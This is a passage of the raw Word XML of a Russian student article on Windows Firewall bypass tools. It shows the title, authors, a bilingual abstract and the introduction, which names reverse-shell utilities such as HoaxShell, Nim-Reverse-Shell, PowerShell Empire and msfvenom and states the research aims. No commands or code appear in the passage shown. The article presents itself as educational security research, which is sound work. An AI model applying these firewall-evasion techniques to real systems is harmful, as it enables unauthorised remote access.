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0724C" w14:textId="77777777" w:rsidR="009C6BEA" w:rsidRDefault="001D076D" w:rsidP="007B3B12">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D076D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Инструменты обхода защиты Windows Firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BDB4A3" w14:textId="77777777" w:rsidR="001D076D" w:rsidRPr="001D076D" w:rsidRDefault="001D076D" w:rsidP="001D076D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D076D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Рулёв Степан Анатольевич</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C7A1AF" w14:textId="77777777" w:rsidR="001D076D" w:rsidRPr="001D076D" w:rsidRDefault="001D076D" w:rsidP="001D076D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D076D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Календарев Егор Максимович</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0692B9ED" w14:textId="77777777" w:rsidR="001D076D" w:rsidRPr="001D076D" w:rsidRDefault="001D076D" w:rsidP="001D076D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D076D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Студенты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F37C9C" w14:textId="77777777" w:rsidR="001D076D" w:rsidRPr="001D076D" w:rsidRDefault="001D076D" w:rsidP="001D076D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D076D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>РГУ нефти и газа (НИУ) имени И.М. Губкина, Москва, Россия</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29003966" w14:textId="77777777" w:rsidR="001D076D" w:rsidRPr="00E41638" w:rsidRDefault="001D076D" w:rsidP="001D076D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D076D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Аннотация. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>В статье</w:t>
      </w:r>
      <w:r w:rsidR="005274F7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> представлены возможные методы обхода защиты </w:t>
      </w:r>
      <w:r w:rsidR="005274F7">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="005274F7" w:rsidRPr="005274F7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA3327">
        <w:t>Firewall</w:t>
      </w:r>
      <w:r w:rsidR="005274F7" w:rsidRPr="005274F7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005274F7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>в обучающих целях</w:t>
      </w:r>
      <w:r w:rsidR="00D84BB3">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> с использованием технологии </w:t>
      </w:r>
      <w:r w:rsidR="00D84BB3" w:rsidRPr="00D84BB3">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>реве</w:t>
      </w:r>
      <w:r w:rsidR="00D84BB3">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">рсивной оболочки. </w:t>
      </w:r>
      <w:r w:rsidR="00D84BB3" w:rsidRPr="00D84BB3">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Описываются принципы работы таких утилит, как </w:t>
      </w:r>
      <w:r w:rsidR="00E41638">
        <w:t>HoaxShell</w:t>
      </w:r>
      <w:r w:rsidR="00E41638" w:rsidRPr="00E41638">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E41638">
        <w:t>Nim</w:t>
      </w:r>
      <w:r w:rsidR="00E41638" w:rsidRPr="00E41638">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00E41638">
        <w:t>Reverse</w:t>
      </w:r>
      <w:r w:rsidR="00E41638" w:rsidRPr="00E41638">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00E41638">
        <w:t>Shell</w:t>
      </w:r>
      <w:r w:rsidR="00E41638">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00D84BB3" w:rsidRPr="00D84BB3">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>PowerShell Empire, msfvenom</w:t>
      </w:r>
      <w:r w:rsidR="00E41638">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00D84BB3" w:rsidRPr="00D84BB3">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>а также роль реверс</w:t>
      </w:r>
      <w:r w:rsidR="00E41638">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ив</w:t>
      </w:r>
      <w:r w:rsidR="00D84BB3" w:rsidRPr="00D84BB3">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">ных соединений в обходе ограничений на входящие соединения. Статья предназначена для специалистов по информационной безопасности, </w:t>
      </w:r>
      <w:r w:rsidR="00E41638" w:rsidRPr="00E41638">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>сис</w:t>
      </w:r>
      <w:r w:rsidR="00E41638">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">темным администраторам, разработчикам, интересующимся и нуждающимся в качественном использовании </w:t>
      </w:r>
      <w:r w:rsidR="00E41638">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00C0330B" w:rsidRPr="00C0330B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C0330B">
        <w:t>Firewall</w:t>
      </w:r>
      <w:r w:rsidR="00E41638" w:rsidRPr="00E41638">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A6D7E6" w14:textId="77777777" w:rsidR="001D076D" w:rsidRPr="008D0837" w:rsidRDefault="001D076D" w:rsidP="001D076D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D076D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Ключевые</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0837">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001D076D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>слова</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0837">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0837">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008D0837" w:rsidRPr="008D0837">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D0837">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="008D0837" w:rsidRPr="008D0837">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 11</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0837">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001D076D">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0837">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0837">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008D0837">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>файрволл</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0837">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="005274F7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>терминал</w:t>
      </w:r>
      <w:r w:rsidR="008D0837" w:rsidRPr="008D0837">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008D0837">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>командная строка, реверсивная</w:t>
      </w:r>
      <w:r w:rsidR="00D12BFB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> оболочка</w:t>
      </w:r>
      <w:r w:rsidR="008D0837">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B53DDE" w14:textId="77777777" w:rsidR="001D076D" w:rsidRDefault="001D076D" w:rsidP="001D076D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D076D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Для цитирования: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Рулёв С.А. </w:t>
      </w:r>
      <w:r w:rsidRPr="001D076D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Календарев Е.М. (2025). Инструменты обхода защиты </w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="001D076D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="001D076D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1320AC" w14:textId="77777777" w:rsidR="008D0837" w:rsidRDefault="008D0837" w:rsidP="001D076D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07D95B14" w14:textId="77777777" w:rsidR="008D0837" w:rsidRDefault="008D0837">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3887B3A8" w14:textId="77777777" w:rsidR="008D0837" w:rsidRPr="00EA21F2" w:rsidRDefault="008D0837" w:rsidP="008D0837">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA21F2">
        <w:lastRenderedPageBreak/>
        <w:t>Windows Firewall Bypass Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49040002" w14:textId="77777777" w:rsidR="008D0837" w:rsidRPr="008D0837" w:rsidRDefault="008D0837" w:rsidP="008D0837">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0837">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rulev Stepan Anatolievich</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39812D9C" w14:textId="77777777" w:rsidR="008D0837" w:rsidRDefault="008D0837" w:rsidP="008D0837">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0837">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kalendarev Egor Maksimovich</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBF8E31" w14:textId="77777777" w:rsidR="008D0837" w:rsidRDefault="008D0837" w:rsidP="008D0837">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0837">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>National University of Oil and Gas «Gubkin university»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBEC371" w14:textId="77777777" w:rsidR="008D0837" w:rsidRDefault="008D0837" w:rsidP="008D0837">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E41638">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ann</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>otation.</w:t>
      </w:r>
      <w:r w:rsidR="00E41638" w:rsidRPr="00E41638">
        <w:t xml:space="preserve"> The article presents possible methods of circumventing Windows </w:t>
      </w:r>
      <w:r w:rsidR="00A72FF4">
        <w:t>Firewall</w:t>
      </w:r>
      <w:r w:rsidR="00E41638" w:rsidRPr="00E41638">
        <w:t xml:space="preserve"> protection for educational purposes using reverse shell technology. The principles of operation of such utilities as HoaxShell, N</w:t>
      </w:r>
      <w:r w:rsidR="00C0330B">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00E41638" w:rsidRPr="00E41638">
        <w:t xml:space="preserve">m-Reverse-Shell, PowerShell Empire, msfvenom, as well as the role of reverse connections in circumventing restrictions on incoming connections are described. The article is intended for information security specialists, system administrators, and developers who are interested in and need high-quality use of Windows </w:t>
      </w:r>
      <w:r w:rsidR="00FA3327">
        <w:t>Firewall</w:t>
      </w:r>
      <w:r w:rsidR="00E41638" w:rsidRPr="00E41638">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275CB77E" w14:textId="77777777" w:rsidR="008D0837" w:rsidRDefault="008D0837" w:rsidP="008D0837">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Keywords: </w:t>
      </w:r>
      <w:r w:rsidRPr="008D0837">
        <w:t>Windows, Windows 11, Windows Firewall, firewall, terminal, command line, reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF836EA" w14:textId="77777777" w:rsidR="008D0837" w:rsidRPr="00EA21F2" w:rsidRDefault="008D0837" w:rsidP="008D0837">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">For citation: </w:t>
      </w:r>
      <w:r w:rsidRPr="008D0837">
        <w:t>Rulev S.A. &amp; Kalendarev E.M. (2025). Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA21F2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D0837">
        <w:t>Firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA21F2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D0837">
        <w:t>Bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA21F2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D0837">
        <w:t>Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA21F2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5F7631" w14:textId="77777777" w:rsidR="00D12BFB" w:rsidRPr="00EA21F2" w:rsidRDefault="00D12BFB" w:rsidP="008D0837">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C45FEB4" w14:textId="77777777" w:rsidR="00D12BFB" w:rsidRPr="00EA21F2" w:rsidRDefault="00D12BFB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA21F2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0449357B" w14:textId="77777777" w:rsidR="00D12BFB" w:rsidRDefault="00D12BFB" w:rsidP="00D12BFB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Введение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07956D5A" w14:textId="77777777" w:rsidR="00F167C7" w:rsidRDefault="00D12BFB" w:rsidP="00F167C7">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12BFB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Современные операционные системы, включая Windows, оснащаются встроенными механизмами защиты</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. Одним из таких механизмов является </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12BFB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Firewall. Он играет важную роль в контроле входящего и исходящего сетевого трафика, ограничивая потенциально опасные соединения и предотвращая несанкционированный доступ. Однако, несмотря на высокую эффективность, существуют методики, позволяющие обойти эту защиту, особенно в контексте </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>реверсивных оболочек</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12BFB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (reverse shell)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A90DBFB" w14:textId="77777777" w:rsidR="00D12BFB" w:rsidRDefault="00F167C7" w:rsidP="00F167C7">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F167C7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Актуальность исследования обусловлена ростом интереса к методам удалённого управления системами, а также необходимостью повышения устойчивости защитных механизмов к таким видам взаимодействия. Использование</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> реверсивных оболочек</w:t>
      </w:r>
      <w:r w:rsidRPr="00F167C7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> позволяет злоумышленникам инициировать соединение</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> между машинами</w:t>
      </w:r>
      <w:r w:rsidRPr="00F167C7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> изнутри защищаемой системы, что даёт возможность обойти внешние фильтры и межсетевые экраны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7253EE31" w14:textId="77777777" w:rsidR="00F167C7" w:rsidRDefault="00F167C7" w:rsidP="00F167C7">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>В исследовании</w:t>
      </w:r>
      <w:r w:rsidR="0087676D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> наиболее</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> подробно разобраны такие инструменты и утилиты, как </w:t>
      </w:r>
      <w:r>
        <w:t>Nim</w:t>
      </w:r>
      <w:r w:rsidRPr="00F167C7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>Reverse</w:t>
      </w:r>
      <w:r w:rsidRPr="00F167C7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00F167C7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E41638">
        <w:t>HoaxShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F167C7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">но также существуют и </w:t>
      </w:r>
      <w:r w:rsidRPr="00F167C7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>powershell Empire,</w:t>
      </w:r>
      <w:r w:rsidR="00715B33">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00715B33">
        <w:t>msfvenov</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E5CEFB" w14:textId="77777777" w:rsidR="0011236C" w:rsidRPr="00F167C7" w:rsidRDefault="0011236C" w:rsidP="00F167C7">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011236C">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Целью данного исследования является анализ уязвимостей, позволяющих обойти Windows Firewall с помощью реверсивных соединений, и проверка эффективности защиты Windows 11 при использовании популярных инструментов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43422C5B" w14:textId="77777777" w:rsidR="00F167C7" w:rsidRDefault="00F167C7" w:rsidP="00C148FC">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F167C7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Основные задачи, стоящие перед исследованием, заключаются в анализе эффективности встроенных защит Windows 11 против </w:t>
      </w:r>
      <w:r w:rsidR="00A1503B" w:rsidRPr="00A1503B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>подо</w:t>
      </w:r>
      <w:r w:rsidR="00A1503B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>бных</w:t>
      </w:r>
      <w:r w:rsidRPr="00F167C7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> техник</w:t>
      </w:r>
      <w:r w:rsidR="0011236C">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAC693C" w14:textId="77777777" w:rsidR="0011236C" w:rsidRPr="0011236C" w:rsidRDefault="0011236C" w:rsidP="0011236C">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011236C">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0011236C">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Проанализировать архитектуру Windows Firewall в Windows 11;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4E1C41" w14:textId="77777777" w:rsidR="0011236C" w:rsidRPr="0011236C" w:rsidRDefault="0011236C" w:rsidP="0011236C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011236C">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0011236C">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Исследовать существующие подходы к созданию реверсивных оболочек;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189ED450" w14:textId="77777777" w:rsidR="0011236C" w:rsidRPr="0011236C" w:rsidRDefault="0011236C" w:rsidP="0011236C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011236C">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
